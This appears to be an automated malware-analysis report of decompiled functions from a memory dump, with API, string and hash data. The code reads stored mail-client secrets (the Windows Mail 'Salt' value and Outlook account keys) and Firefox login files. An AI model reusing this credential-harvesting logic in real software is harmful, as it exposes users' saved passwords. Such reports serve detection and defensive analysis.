0x0040e16a
0x0040e16a
0x00000000
0x0040e167

APIs

LoadLibraryA.KERNEL32(psapi.dll,?,0040DD12), ref: 0040E0ED
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040E106
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040E117
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040E128
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040E139
GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040E14A
FreeLibrary.KERNEL32(00000000), ref: 0040E16A

Strings

psapi.dll, xrefs: 0040E0E8
GetModuleInformation, xrefs: 0040E144
GetModuleBaseNameA, xrefs: 0040E100
EnumProcessModules, xrefs: 0040E111
GetModuleFileNameExA, xrefs: 0040E122
EnumProcesses, xrefs: 0040E133

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
API String ID: 2449869053-232097475
Opcode ID: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
Instruction ID: ee37d54ff12c00b719d991246764d0af3e5b6fb2a2d0f9e8910a6c9c4b0fdd5c
Opcode Fuzzy Hash: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
Instruction Fuzzy Hash: F0015E31740311EAC711EB266D40FE73EB85B48B91B11843BE544E52A4D778C5928A6C

Uniqueness

Uniqueness Score: -1.00%

Function 00410525, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00410525(char* __eax, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v6;
				char _v7;
				char _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				short* _v24;
				unsigned int _v28;
				char* _v32;
				int _v36;
				intOrPtr _v40;
				signed int _v44;
				void _v299;
				char _v300;
				void _v555;
				char _v556;
				char _v1080;
				void* __esi;
				int _t56;
				intOrPtr _t58;
				intOrPtr _t64;
				char _t92;
				char* _t93;
				void* _t100;
				signed int _t102;
				signed int _t107;
				intOrPtr _t108;
				void* _t113;

				_t113 = __eflags;
				_t100 = __edx;
				_t93 = __eax;
				E004046D7( &_v1080);
				if(E004047A0( &_v1080, _t113) != 0) {
					_t56 = strlen(_t93);
					asm("cdq");
					_t107 = _t56 - _t100 >> 1;
					_t2 = _t107 + 1; // 0x1
					_t58 = _t2;
					L004115D0();
					_t102 = 0;
					_t96 = _t58;
					_v16 = _t58;
					if(_t107 > 0) {
						do {
							_v8 =  *((intOrPtr*)(_t93 + _t102 * 2));
							_v7 = _t93[1 + _t102 * 2];
							_v6 = 0;
							_t92 = E00406512( &_v8);
							_t96 = _v16;
							 *((char*)(_t102 + _v16)) = _t92;
							_t102 = _t102 + 1;
						} while (_t102 < _t107);
					}
					_v556 = 0;
					memset( &_v555, 0, 0xff);
					_v12 = 0;
					_v300 = 0;
					memset( &_v299, 0, 0xfe);
					_t64 =  *((intOrPtr*)(_a4 + 0x86c));
					if(_t64 != 1) {
						__eflags = _t64 - 2;
						if(_t64 == 2) {
							_push("Software\\Microsoft\\Windows Live Mail");
							goto L7;
						}
					} else {
						_push("Software\\Microsoft\\Windows Mail");
						L7:
						strcpy( &_v300, ??);
						_pop(_t96);
					}
					if(E0040EB3F(0x80000001,  &_v300,  &_v20) == 0) {
						_v12 = 0xff;
						E0040EBA3(_t96, _v20, "Salt",  &_v556,  &_v12);
						RegCloseKey(_v20);
					}
					_v40 = _v16;
					_v36 = _v12;
					_v32 =  &_v556;
					_v44 = _t107;
					if(E00404811( &_v1080,  &_v44,  &_v36,  &_v28) != 0) {
						_t108 = _a8;
						WideCharToMultiByte(0, 0, _v24, _v28 >> 1, _t108 + 0x400, 0xff, 0, 0);
						(_t108 + 0x400)[_v28 >> 1] = 0;
						LocalFree(_v24);
					}
					_push(_v16);
					L004115D6();
				}
				return E004047F1( &_v1080);
			}

0x00410525
0x00410525
0x00410536
0x00410538
0x00410544
0x0041054c
0x00410551
0x00410556
0x00410558
0x00410558
0x0041055c
0x00410562
0x00410566
0x00410567
0x0041056a
0x0041056c
0x0041056f
0x00410576
0x0041057d
0x00410581
0x00410587
0x0041058a
0x0041058d
0x0041058e
0x0041056c
0x004105a1
0x004105a8
0x004105bc
0x004105bf
0x004105c5
0x004105cd
0x004105d9
0x004105e2
0x004105e5
0x004105e7
0x00000000
0x004105e7
0x004105db
0x004105db
0x004105ec
0x004105f3
0x004105f9
0x004105f9
0x00410614
0x00410629
0x0041062c
0x00410637
0x00410637
0x00410640
0x00410646
0x0041064f
0x00410664
0x0041066e
0x00410670
0x00410688
0x00410693
0x0041069d
0x0041069d
0x004106a3
0x004106a6
0x004106ac
0x004106bb

APIs

Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726

Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7614F420), ref: 004047A8
Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0

strlen.MSVCRT ref: 0041054C
??2@YAPAXI@Z.MSVCRT ref: 0041055C
memset.MSVCRT ref: 004105A8
memset.MSVCRT ref: 004105C5
strcpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 004105F3
RegCloseKey.ADVAPI32(?), ref: 00410637
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00410688
LocalFree.KERNEL32(?), ref: 0041069D
??3@YAXPAX@Z.MSVCRT ref: 004106A6

Part of subcall function 00406512: strtoul.MSVCRT ref: 0040651A

Strings

Software\Microsoft\Windows Mail, xrefs: 004105DB
Salt, xrefs: 00410621
Software\Microsoft\Windows Live Mail, xrefs: 004105E7

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memsetstrcpy$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
API String ID: 1673043434-2687544566
Opcode ID: e02606ea618a87a1148e8cb15b8a6f6052109a9c4d8ad17a07ff7bfd0f9df468
Instruction ID: 7afd7cd9a60bb03764dcbc3854d87102a14f95683297c5d7d0928fc071fa2b2b
Opcode Fuzzy Hash: e02606ea618a87a1148e8cb15b8a6f6052109a9c4d8ad17a07ff7bfd0f9df468
Instruction Fuzzy Hash: D14186B2C0011CAECB11DBA5DC81ADEBBBCAF48344F1041ABE645F3251DA349A95CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004080A3, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86
windowCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E004080A3(void* __ecx, void* __edi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, CHAR* _a12) {
				void _v4103;
				char _v4104;
				char _t30;
				struct HMENU__* _t32;
				char _t39;
				void* _t42;
				struct HWND__* _t43;
				struct HMENU__* _t48;

				_t42 = __edi;
				_t38 = __ecx;
				E004118A0(0x1004, __ecx);
				_t55 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t39 =  *0x417488;
						__eflags = _t39;
						if(_t39 == 0) {
							L8:
							_push(_t42);
							sprintf(0x4172c0, "dialog_%d", _a12);
							_t43 = CreateDialogParamA(_a4, _a12, 0, E0040809E, 0);
							_v4104 = 0;
							memset( &_v4103, 0, 0x1000);
							GetWindowTextA(_t43,  &_v4104, 0x1000);
							__eflags = _v4104;
							if(__eflags != 0) {
								E00407E55(__eflags, "caption",  &_v4104);
							}
							EnumChildWindows(_t43, E00407FEB, 0);
							DestroyWindow(_t43);
						} else {
							while(1) {
								_t30 =  *_t39;
								__eflags = _t30;
								if(_t30 == 0) {
									goto L8;
								}
								__eflags = _t30 - _a12;
								if(_t30 != _a12) {
									_t39 = _t39 + 4;
									__eflags = _t39;
									continue;
								}
								goto L11;
							}
							goto L8;
						}
						L11:
					}
				} else {
					sprintf(0x4172c0, "menu_%d", _a12);
					_t32 = LoadMenuA(_a4, _a12);
					 *0x4171b4 =  *0x4171b4 & 0x00000000;
					_t48 = _t32;
					_push(1);
					_push(_t48);
					_push(_a12);
					E00407EFB(_t38, _t55);
					DestroyMenu(_t48);
				}
				return 1;
			}

0x004080a3
0x004080a3
0x004080ab
0x004080b0
0x004080b5
0x004080fb
0x004080ff
0x00408105
0x0040810e
0x00408110
0x00408126
0x00408126
0x00408134
0x00408155
0x0040815f
0x00408165
0x00408176
0x0040817c
0x00408182
0x00408190
0x00408196
0x0040819e
0x004081a5
0x00408112
0x00408120
0x00408120
0x00408122
0x00408124
0x00000000
0x00000000
0x00408114
0x00408117
0x0040811d
0x0040811d
0x00000000
0x0040811d
0x00000000
0x00408117
0x00000000
0x00408120
0x004081ac
0x004081ac
0x004080b7
0x004080c4
0x004080d2
0x004080d8
0x004080df
0x004080e1
0x004080e3
0x004080e4
0x004080e7
0x004080f0
0x004080f0
0x004081b2

APIs

sprintf.MSVCRT ref: 004080C4
LoadMenuA.USER32 ref: 004080D2

Part of subcall function 00407EFB: GetMenuItemCount.USER32 ref: 00407F10
Part of subcall function 00407EFB: memset.MSVCRT ref: 00407F31
Part of subcall function 00407EFB: GetMenuItemInfoA.USER32 ref: 00407F6C
Part of subcall function 00407EFB: strchr.MSVCRT ref: 00407F83

DestroyMenu.USER32(00000000), ref: 004080F0
sprintf.MSVCRT ref: 00408134
CreateDialogParamA.USER32(?,00000000,00000000,0040809E,00000000), ref: 00408149
memset.MSVCRT ref: 00408165
GetWindowTextA.USER32 ref: 00408176
EnumChildWindows.USER32 ref: 0040819E
DestroyWindow.USER32(00000000), ref: 004081A5

Strings

dialog_%d, xrefs: 0040812A
menu_%d, xrefs: 004080BA
caption, xrefs: 0040818B

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
String ID: caption$dialog_%d$menu_%d
API String ID: 3259144588-3822380221
Opcode ID: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
Instruction ID: 30012a8f5e5a5bdbe68f816da8837f1ba63c4ed8b40bd3c0dd12f77501d21500
Opcode Fuzzy Hash: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
Instruction Fuzzy Hash: 14212172544248BBDB22AF60DD41EEF3B78EF05305F00407AFA41A2190DABC9DA58B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040E056, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E056() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x417514 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleA("kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x416fe0 = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x416fd8 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x416fd4 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x416e6c = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x416fcc = _t2;
								if(_t2 != 0) {
									 *0x417514 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}

0x0040e05d
0x0040e0d9
0x0040e0d9
0x0040e065
0x0040e06b
0x0040e06f
0x0040e0d8
0x00000000
0x0040e0d8
0x0040e07e
0x0040e082
0x0040e087
0x0040e08f
0x0040e093
0x0040e098
0x0040e0a0
0x0040e0a4
0x0040e0a9
0x0040e0b1
0x0040e0b5
0x0040e0ba
0x0040e0c2
0x0040e0c6
0x0040e0cb
0x0040e0cd
0x0040e0cd
0x0040e0cb
0x0040e0ba
0x0040e0a9
0x0040e098
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0040DD19), ref: 0040E065
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040E07E
GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040E08F
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040E0A0
GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040E0B1
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040E0C2

Strings

Process32Next, xrefs: 0040E0BC
CreateToolhelp32Snapshot, xrefs: 0040E078
kernel32.dll, xrefs: 0040E060
Module32First, xrefs: 0040E089
Process32First, xrefs: 0040E0AB
Module32Next, xrefs: 0040E09A

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
API String ID: 667068680-3953557276
Opcode ID: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
Instruction ID: 921299a9b586d994e9bf5e85ab2a2688844625279e80e39ff2614b99c2d6d575
Opcode Fuzzy Hash: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
Instruction Fuzzy Hash: 8DF06D70A45222A9C320CB266D00FFA3DA85A44B81B15843BE900F1694DBF8D5528B7C

Uniqueness

Uniqueness Score: -1.00%

Function 00411015, Relevance: 19.7, APIs: 12, Strings: 1, Instructions: 202
stringCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00411015(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, char* _a12, signed int* _a16) {
				void _v8;
				void _v12;
				void _v24;
				char _v39;
				void _v40;
				char _v132;
				void _v1156;
				void _v1172;
				char _v1180;
				void _v1187;
				char _v1188;
				void _v2228;
				void _v2243;
				void _v2244;
				void _v3267;
				char _v3268;
				void _v4291;
				char _v4292;
				char _v5340;
				void _v5347;
				char _v5348;
				char _v6116;
				char _v7136;
				void _v7140;
				void* __edi;
				void* __esi;
				int _t86;
				void* _t109;
				void* _t122;
				void* _t135;
				char _t156;
				signed char _t168;
				signed int _t171;
				intOrPtr _t177;
				signed int _t183;
				void* _t185;

				_t171 = __edx;
				E004118A0(0x1be4, __ecx);
				_t156 = 0;
				_v3268 = 0;
				memset( &_v3267, 0, 0x3ff);
				_a8 = E00410E8A(_a8,  &_v3268);
				_t86 = strlen(_a4);
				_v8 = _t86;
				if(_a8 > 4) {
					_t193 = _t86;
					if(_t86 > 0) {
						asm("movsd");
						asm("movsd");
						asm("movsb");
						_v2244 = 0;
						memset( &_v2243, 0, 0x41e);
						_v1188 = 0;
						memset( &_v1187, 0, 0x41e);
						_v5348 = 0;
						memset( &_v5347, 0, 0x41e);
						_v40 = 0;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosw");
						asm("stosb");
						_v4292 = 0;
						memset( &_v4291, 0, 0x3ff);
						E0040BC49( &_v132);
						E0040BC6D(_v8,  &_v132, _a4);
						_t181 =  &_v132;
						E0040BD0B( &_v39,  &_v132,  &_v2244);
						memcpy( &_v2228,  &_v24, 8);
						E0040BC49( &_v132);
						_push( &_v2244);
						_t109 = 0x18;
						E0040BC6D(_t109,  &_v132);
						E0040BD0B( &_v39, _t181,  &_v1188);
						memcpy( &_v1172,  &_v2244, 0x10);
						memcpy( &_v1156,  &_v24, 8);
						E0040BC49(_t181);
						_push( &_v1188);
						_t122 = 0x28;
						E0040BC6D(_t122, _t181);
						E0040BD0B( &_v39, _t181,  &_v5348);
						E0040535A( &_v6116, _t193,  &_v1180,  &_v5348);
						E004053D6( &_v5340,  &_v1188,  &_v4292,  &_v6116);
						_t177 = _a8;
						asm("cdq");
						_t183 = _t177 + (_t171 & 0x00000007) >> 3;
						_a4 = 0;
						if(_t183 > 0) {
							do {
								E004053D6(_t185 + (_a4 << 3) - 0xcc0,  &_v6116, _t185 + (_a4 << 3) - 0x10b8,  &_v6116);
								_a4 =  &(_a4[1]);
							} while (_a4 < _t183);
							_t177 = _a8;
						}
						_t135 = 0;
						if(_t177 > _t156) {
							do {
								_t168 =  *(_t185 + _t135 - 0x10c0) ^  *(_t185 + _t135 - 0xcc0);
								_t135 = _t135 + 1;
								 *(_t185 + _t135 - 0x1be1) = _t168;
							} while (_t135 < _t177);
						}
						 *((char*)(_t185 + _t177 - 0x1be0)) = _t156;
						strcpy(_a12,  &_v7136);
						E0040BC49( &_v132);
						_t67 = _t177 - 4; // 0x0
						E0040BC6D(_t67,  &_v132, _a12);
						E0040BD0B(_t177,  &_v132,  &_v40);
						memcpy( &_v8,  &_v40, 4);
						memcpy( &_v12,  &_v7140, 4);
						_t156 = 1;
						 *_a16 = 0 | _v8 == _v12;
					}
				}
				return _t156;
			}

0x00411015
0x0041101d
0x00411025
0x00411034
0x0041103a
0x00411053
0x00411056
0x00411060
0x00411063
0x00411069
0x0041106b
0x00411079
0x0041107a
0x0041107b
0x0041108a
0x00411090
0x0041109e
0x004110a4
0x004110b2
0x004110b8
0x004110bf
0x004110c5
0x004110c6
0x004110c7
0x004110c8
0x004110cf
0x004110d8
0x004110de
0x004110e6
0x004110f4
0x00411100
0x00411103
0x00411115
0x0041111f
0x0041112a
0x0041112d
0x00411130
0x0041113c
0x00411151
0x00411163
0x0041116a
0x00411175
0x00411178
0x0041117b
0x00411187
0x004111a6
0x004111be
0x004111c3
0x004111c8
0x004111d0
0x004111d8
0x004111db
0x004111dd
0x004111f8
0x004111fd
0x00411203
0x00411206
0x00411206
0x00411209
0x0041120d
0x0041120f
0x00411216
0x0041121d
0x00411220
0x00411220
0x0041120f
0x00411233
0x0041123a
0x00411242
0x0041124a
0x00411250
0x0041125c
0x0041126b
0x0041127d
0x00411295
0x00411296
0x00411296
0x0041106b
0x0041129e

APIs

memset.MSVCRT ref: 0041103A

Part of subcall function 00410E8A: strlen.MSVCRT ref: 00410E97

strlen.MSVCRT ref: 00411056
memset.MSVCRT ref: 00411090
memset.MSVCRT ref: 004110A4
memset.MSVCRT ref: 004110B8
memset.MSVCRT ref: 004110DE

Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCFE

Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD2A
Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD40
Part of subcall function 0040BD0B: memcpy.MSVCRT ref: 0040BD77
Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD81

memcpy.MSVCRT ref: 00411115

Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCB0
Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCDA

Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD52

memcpy.MSVCRT ref: 00411151
memcpy.MSVCRT ref: 00411163
strcpy.MSVCRT(?,?), ref: 0041123A
memcpy.MSVCRT ref: 0041126B
memcpy.MSVCRT ref: 0041127D

Strings

salu, xrefs: 00411071

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memcpymemset$strlen$strcpy
String ID: salu
API String ID: 2660478486-4177317985
Opcode ID: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
Instruction ID: 480a48fc981763c339c301d1addb7ab339a070bf665ce532ed27993edd9122c1
Opcode Fuzzy Hash: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
Instruction Fuzzy Hash: A4717F7190011DAADB10EBA9CC819DEB7BDFF08348F1445BAF609E7151DB749B888F94

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1EC, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 128
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040D1EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void _v267;
				char _v268;
				void* __edi;
				void* __esi;
				void* _t31;
				int _t40;
				void* _t44;
				void* _t49;
				char* _t50;
				void* _t57;
				int _t62;
				char* _t68;
				void* _t70;
				void* _t73;
				void* _t74;
				intOrPtr* _t86;
				char* _t89;
				void* _t90;
				char** _t91;

				_t86 = __eax;
				_t31 = E00406C2F(__eax + 0x1c, __eax, __eflags, _a4);
				_t94 = _t31;
				if(_t31 == 0) {
					__eflags = 0;
					return 0;
				}
				E0040462E(_t86 + 0x468);
				_t68 = _t86 + 0x158;
				E004061FF(_t68, _a4);
				_t89 = _t86 + 0x25d;
				 *_t89 = 0;
				E0040C530(_t94, _t86 + 0x18);
				if( *_t89 == 0) {
					_t62 = strlen(_t68);
					 *_t91 = "signons.txt";
					_t9 = strlen(??) + 1; // 0x1
					if(_t62 + _t9 >= 0x104) {
						 *_t89 = 0;
					} else {
						E004062AD(_t89, _t86 + 0x158, "signons.txt");
					}
				}
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t40 = strlen(_t86 + 0x158);
				_t91[3] = "signons.sqlite";
				_t15 = strlen(??) + 1; // 0x1
				_pop(_t73);
				if(_t40 + _t15 >= 0x104) {
					_v268 = 0;
				} else {
					E004062AD( &_v268, _t86 + 0x158, "signons.sqlite");
					_pop(_t73);
				}
				_t98 =  *_t89;
				if( *_t89 != 0) {
					_t57 = E00406C2F(_t86 + 4, _t86, _t98, _t89);
					_t99 = _t57;
					if(_t57 != 0) {
						E0040C475(_t73, _t86, _t99);
					}
				}
				_t44 = E0040614B( &_v268);
				_t100 = _t44;
				_pop(_t74);
				if(_t44 != 0) {
					E0040CE28(_t74, _t100, _t86,  &_v268);
				}
				_t70 = 0;
				if( *((intOrPtr*)(_t86 + 0x474)) <= 0) {
					L19:
					return 1;
				} else {
					do {
						_t90 = E0040D438(_t70, _t86 + 0x468);
						_t24 = _t90 + 0x504; // 0x504
						_t49 = _t24;
						_push("none");
						_push(_t49);
						L004115B2();
						if(_t49 != 0) {
							_t25 = _t90 + 4; // 0x4
							_t50 = _t25;
							if( *_t50 == 0) {
								_t26 = _t90 + 0x204; // 0x204
								strcpy(_t50, _t26);
							}
							 *((intOrPtr*)( *_t86 + 4))(_t90);
						}
						_t70 = _t70 + 1;
					} while (_t70 <  *((intOrPtr*)(_t86 + 0x474)));
					goto L19;
				}
			}

0x0040d1fb
0x0040d200
0x0040d205
0x0040d207
0x0040d371
0x00000000
0x0040d371
0x0040d213
0x0040d21b
0x0040d223
0x0040d22c
0x0040d233
0x0040d236
0x0040d23e
0x0040d241
0x0040d248
0x0040d254
0x0040d25e
0x0040d277
0x0040d260
0x0040d26e
0x0040d274
0x0040d25e
0x0040d288
0x0040d28f
0x0040d29e
0x0040d2a5
0x0040d2b1
0x0040d2ba
0x0040d2bb
0x0040d2d8
0x0040d2bd
0x0040d2cf
0x0040d2d5
0x0040d2d5
0x0040d2df
0x0040d2e2
0x0040d2e8
0x0040d2ed
0x0040d2ef
0x0040d2f1
0x0040d2f1
0x0040d2ef
0x0040d2fd
0x0040d302
0x0040d304
0x0040d305
0x0040d30f
0x0040d30f
0x0040d314
0x0040d31c
0x0040d36c
0x00000000
0x0040d31e
0x0040d31e
0x0040d32b
0x0040d32d
0x0040d32d
0x0040d333
0x0040d338
0x0040d339
0x0040d342
0x0040d344
0x0040d344
0x0040d34a
0x0040d34c
0x0040d354
0x0040d35a
0x0040d360
0x0040d360
0x0040d363
0x0040d364
0x00000000
0x0040d31e

APIs

Part of subcall function 00406C2F: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D205,?,?,?,?), ref: 00406C48
Part of subcall function 00406C2F: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00406C74

Part of subcall function 0040462E: free.MSVCRT(00000000,0040BC35), ref: 00404635

Part of subcall function 004061FF: strcpy.MSVCRT(?,?,0040D228,?,?,?,?,?), ref: 00406204
Part of subcall function 004061FF: strrchr.MSVCRT ref: 0040620C

Part of subcall function 0040C530: memset.MSVCRT ref: 0040C551
Part of subcall function 0040C530: memset.MSVCRT ref: 0040C565
Part of subcall function 0040C530: memset.MSVCRT ref: 0040C579
Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C646
Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C6A6

strlen.MSVCRT ref: 0040D241
strlen.MSVCRT ref: 0040D24F

Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4

memset.MSVCRT ref: 0040D28F
strlen.MSVCRT ref: 0040D29E
strlen.MSVCRT ref: 0040D2AC
_stricmp.MSVCRT(00000504,none,?,?,?), ref: 0040D339
strcpy.MSVCRT(00000004,00000204,?,?,?), ref: 0040D354

Strings

signons.txt, xrefs: 0040D248, 0040D266
signons.sqlite, xrefs: 0040D2A5, 0040D2C3
none, xrefs: 0040D333

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memsetstrlen$strcpy$memcpy$CloseFileHandleSize_stricmpfreestrcatstrrchr
String ID: none$signons.sqlite$signons.txt
API String ID: 2681923396-1088577317
Opcode ID: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
Instruction ID: 747294efef189d2a86bae337d02489a359e47e35f4212505bb9232dde5c11721
Opcode Fuzzy Hash: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
Instruction Fuzzy Hash: 3041E3B1508246AAD710EBB1CC81BDAB798AF40305F10057FE596E21C2EB7CE9C9876D

Uniqueness

Uniqueness Score: -1.00%

Function 00402C44, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C44(void* __ecx, void* __fp0, intOrPtr _a4) {
				void* _v8;
				int _v12;
				char _v16;
				char _v20;
				void _v275;
				char _v276;
				void _v1299;
				char _v1300;
				void* __esi;
				void* _t35;
				intOrPtr _t36;
				void* _t40;
				void* _t52;
				void* _t58;
				void* _t60;
				void* _t64;
				char* _t66;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t83;

				_t83 = __fp0;
				_t64 = __ecx;
				_t35 = E0040EB3F(0x80000001, "Identities",  &_v8);
				_t74 = _t73 + 0xc;
				if(_t35 == 0) {
					_v12 = 0;
					_v276 = 0;
					memset( &_v275, 0, 0xff);
					_t40 = E0040EC05(_v8, 0,  &_v276);
					_t75 = _t74 + 0x18;
					if(_t40 == 0) {
						_t66 = "%s\\%s";
						do {
							_t69 = _a4;
							E0040EBC1(_t64, _v8,  &_v276, "Username", _a4 + 0xa9c, 0x7f);
							_v1300 = 0;
							memset( &_v1299, 0, 0x3ff);
							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Internet Account Manager\\Accounts");
							_t52 = E0040EB3F(_v8,  &_v1300,  &_v16);
							_t76 = _t75 + 0x3c;
							_t80 = _t52;
							if(_t52 == 0) {
								E00402BB8(_t64,  &_v16, _t80, _t83, _t69, 1);
							}
							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts");
							_t58 = E0040EB3F(_v8,  &_v1300,  &_v20);
							_t77 = _t76 + 0x1c;
							_t81 = _t58;
							if(_t58 == 0) {
								E00402BB8(_t64,  &_v20, _t81, _t83, _a4, 5);
							}
							_v12 = _v12 + 1;
							_t60 = E0040EC05(_v8, _v12,  &_v276);
							_t75 = _t77 + 0xc;
						} while (_t60 == 0);
					}
					RegCloseKey(_v8);
				}
				_t36 = _a4;
				 *((char*)(_t36 + 0xa9c)) = 0;
				return _t36;
			}

0x00402c44
0x00402c44
0x00402c5c
0x00402c61
0x00402c68
0x00402c7b
0x00402c7e
0x00402c84
0x00402c94
0x00402c99
0x00402c9e
0x00402ca6
0x00402cab
0x00402cab
0x00402cc6
0x00402cd8
0x00402cde
0x00402cf7
0x00402d0a
0x00402d0f
0x00402d12
0x00402d14
0x00402d1c
0x00402d1c
0x00402d35
0x00402d48
0x00402d4d
0x00402d50
0x00402d52
0x00402d5c
0x00402d5c
0x00402d61
0x00402d71
0x00402d76
0x00402d79
0x00402d82
0x00402d86
0x00402d86
0x00402d8c
0x00402d8f
0x00402d97

APIs

Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52

